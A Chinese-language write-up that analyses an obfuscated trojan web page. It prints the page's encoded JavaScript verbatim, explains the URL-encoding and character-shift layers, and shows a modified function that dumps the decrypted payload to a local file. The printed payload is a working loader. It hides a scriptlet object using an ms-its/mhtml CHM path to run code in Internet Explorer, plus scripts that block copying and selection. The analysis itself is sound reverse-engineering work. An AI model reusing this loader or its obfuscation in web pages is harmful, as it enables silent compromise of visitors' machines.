function psw(st)加密类型木马破解

<HTML>
<HEAD>
<SCRIPT LANGUAGE="javascript">
<!--
var Words

="%3CSCRIPT%20LANGUAGE%3D%22javascript%22%3E%0D%0A%3C%21%2D%2D%0D%0Avar%20HtmlStrings%3D%5B%22%3Dcpez%21podpoufyunfov%3E%23sf

uvso%21gbmtf%23%21poesbhtubsu%3E%23sfuvso%21gbmtf%23%21po%22%2C%22tfmfdutubsu%21%3E%23sfuvso%21gbmtf%23%21potfmfdu%3E%23epdvn

fou%2Ftfmfdujpo%2Ffnqu%22%2C%22z%29%2A%23%21podpqz%3E%23epdvnfou%2Ftfmfdujpo%2Ffnquz%29%2A%23%21pocfgpsfdpqz%3E%23sfuvso%22%2

C%22%21gbmtf%23%21ponpvtfvq%3E%23epdvnfou%2Ftfmfdujpo%2Ffnquz%29%2A%23%02%3E%3Doptdsjqu%02%3E%3Dj%22%2C%22gsbnf%21tsd%3E%2B%0

2%3E%3D0jgsbnf%02%3E%3D0optdsjqu%02%3E%0E%0B%3Dufyubsfb%21je%3E%23dpef%23%21tuzm%22%2C%22f%3E%23ejtqmbz%3Bopof%3C%23%02%3E%0E

%0B%3Dpckfdu%21ebub%3E%23%27%2421%3A%3Ct%2Ejut%3Bniunm%3Bgjmf%3B00d%22%2C%22%3B%5Dgpp%2Fniu%01%25%7Cqbui%7E0tzt%2Fdin%3B%3B0t

zt%2Fiun%23%21uzqf%3E%23ufyu0y%2Etdsjqumfu%23%02%3E%0E%0B%3D0pckfdu%02%3E%0E%0B%3D0ufyubsfb%02%3E%0E%0B%3Dtdsjqu%21mbohvbhf%3

E%23kbwbtdsjqu%23%02%3E%0E%0Bep%22%2C%22dvnfou%2Fxsjuf%29dpef%2Fwbmvf%2Fsfqmbdf%290%5D%25%7Cqbui%7E0h%2Dmpdbujpo%2Fisfg%2Ftvc

%22%2C%22tusjoh%291%2Dmpdbujpo%2Fisfg%2FjoefyPg%29%28tzt%2Fiun%28%2A%2A%2A%2A%3C%0E%0B%3D0tdsjqu%02%3E%0E%0B%22%5D%3B%0D%0Afu

nction%20psw%28st%29%7B%0D%0A%20%20var%20varS%3B%0D%0A%20%20varS%3D%22%22%3B%0D%0A%20%20var%20i%3B%0D%0A%20%20for%28var%20a%3

D0%3Ba%3Cst%2Elength%3Ba%2B%2B%29%7B%0D%0A%20%20%20%20i%20%3D%20st%2EcharCodeAt%28a%29%3B%20%0D%0A%20%20%20%20if%20%28i%3D%3D

1%29%20%0D%0A%20%20%20%20%20%20varS%3DvarS%2BString%2EfromCharCode%28%27%22%27%2EcharCodeAt%28%29%2D1%29%3B%0D%0A%20%20%20%20

else%20if%20%28i%3D%3D2%29%20%7B%0D%0A%20%20%20%20%20%20a%2B%2B%3B%0D%0A%20%20%20%20%20%20varS%2B%3DString%2EfromCharCode%28s

t%2EcharCodeAt%28a%29%29%3B%0D%0A%20%20%20%20%20%20%7D%0D%0A%20%20%20%20else%0D%0A%20%20%20%20%20%20varS%2B%3DString%2EfromCh

arCode%28i%2D1%29%3B%0D%0A%20%20%7D%0D%0A%20%20return%20varS%3B%0D%0A%7D%3B%0D%0Avar%20num%3D9%3B%0D%0Afunction%20S%28%29%7B%

0D%0Afor%28i%3D0%3Bi%3Cnum%3Bi%2B%2B%29%0D%0A%20%20document%2Ewrite%28psw%28HtmlStrings%5Bi%5D%29%29%3B%7D%0D%0AS%28%29%3B%0D

%0A%2F%2F%20%2D%2D%3E%0D%0A%3C%2FSCRIPT%3E%0D%0A%0D%0A"
function SetNewWords()
{
var NewWords;
NewWords = unescape(Words);
document.write(NewWords);
}

SetNewWords();
// -->
</SCRIPT>
</HEAD>
<BODY>
</BODY>
</HTML>

很明显，网页的内容是经过加密处理的，这个网页想干什么呢？
经过分析，发现它的加密算法很简单，仅仅是进行了简单的替换，如空格变成了%20，回车换行变成了%0D%0A，其他的都经过了类似的变换。

解密后的Words的内容如下：

<SCRIPT LANGUAGE="javascript">
<!--
var

HtmlStrings=["=cpez!podpoufyunfov>#sfuvso!gbmtf#!poesbhtubsu>#sfuvso!gbmtf#!po","tfmfdutubsu!>#sfuvso!gbmtf#!potfmfdu>#epdvnf

ou/tfmfdujpo/fnqu","z)*#!podpqz>#epdvnfou/tfmfdujpo/fnquz)*#!pocfgpsfdpqz>#sfuvso","!gbmtf#!ponpvtfvq>#epdvnfou/tfmfdujpo/fnq

uz)*#\u0002>=optdsjqu\u0002>=j","gsbnf!tsd>+\u0002>=0jgsbnf\u0002>=0optdsjqu\u0002>\u000E =ufyubsfb!je>#dpef#!tuzm","f>#ejtqmbz;opof<#\u0002>\u000E =pckfdu!ebub>#'$2

1:<t.jut;niunm;gjmf;00d",";]gpp/niu\u0001%|qbui~0tzt/din;;0tzt/iun#!uzqf>#ufyu0y.tdsjqumfu#\u0002>\u000E =0pckfdu\u0002>\u000E =0ufyubsfb\u0002>\u000E =tdsjqu!m

bohvbhf>#kbwbtdsjqu#\u0002>\u000E ep","dvnfou/xsjuf)dpef/wbmvf/sfqmbdf)0]%|qbui~0h-mpdbujpo/isfg/tvc","tusjoh)1-mpdbujpo/isfg/joefyPg)(

tzt/iun(****<\u000E =0tdsjqu\u0002>\u000E "];
function psw(st){
  var varS;
  varS="";
  var i;

  for(var a=0;a<st.length;a++){
    i = st.charCodeAt(a);
    if (i==1)
      varS=varS+String.fromCharCode('"'.charCodeAt()-1);
    else if (i==2) {
      a++;
      varS+=String.fromCharCode(st.charCodeAt(a));
      }
    else
      varS+=String.fromCharCode(i-1);
  }
  return varS;
};
var num=9;

function S(){
for(i=0;i<num;i++)
document.write(psw(HtmlStrings[i]));
S();
// -->
</SCRIPT>

HtmlStrings的内容仍然是加密的，看来这个网页的作者有点变态，竟然加密两次，这次的加密算法比较复杂，好在ie是不认识加密代码的，在

运行前它必须自己解密后才能运行，这个解密函数就是function s()，每个字节都用function psw(st)来解密，在这里它已经是明码了。这个

加密算法看起来有点面熟，好像是从某个著名的病毒中抄来的，看来作者也有点懒。

找个简单的办法把HtmlStrings的内容解密，修改一下function S()，改成如下代码：
function S(){
var fso, f1, ts, s;
var ForReading = 1;
fso = new ActiveXObject("Scripting.FileSystemObject");
// 创建文件
f1 = fso.CreateTextFile("c:\\testfile.txt", true);
for(i=0;i<num;i++)
{
//document.write(psw(HtmlStrings[i]));
f1.WriteLine(psw(HtmlStrings[i]));
}
f1.WriteBlankLines(1);
// 关闭文件
f1.Close();
}

运行后在c:\下创建了一个文件testfile.txt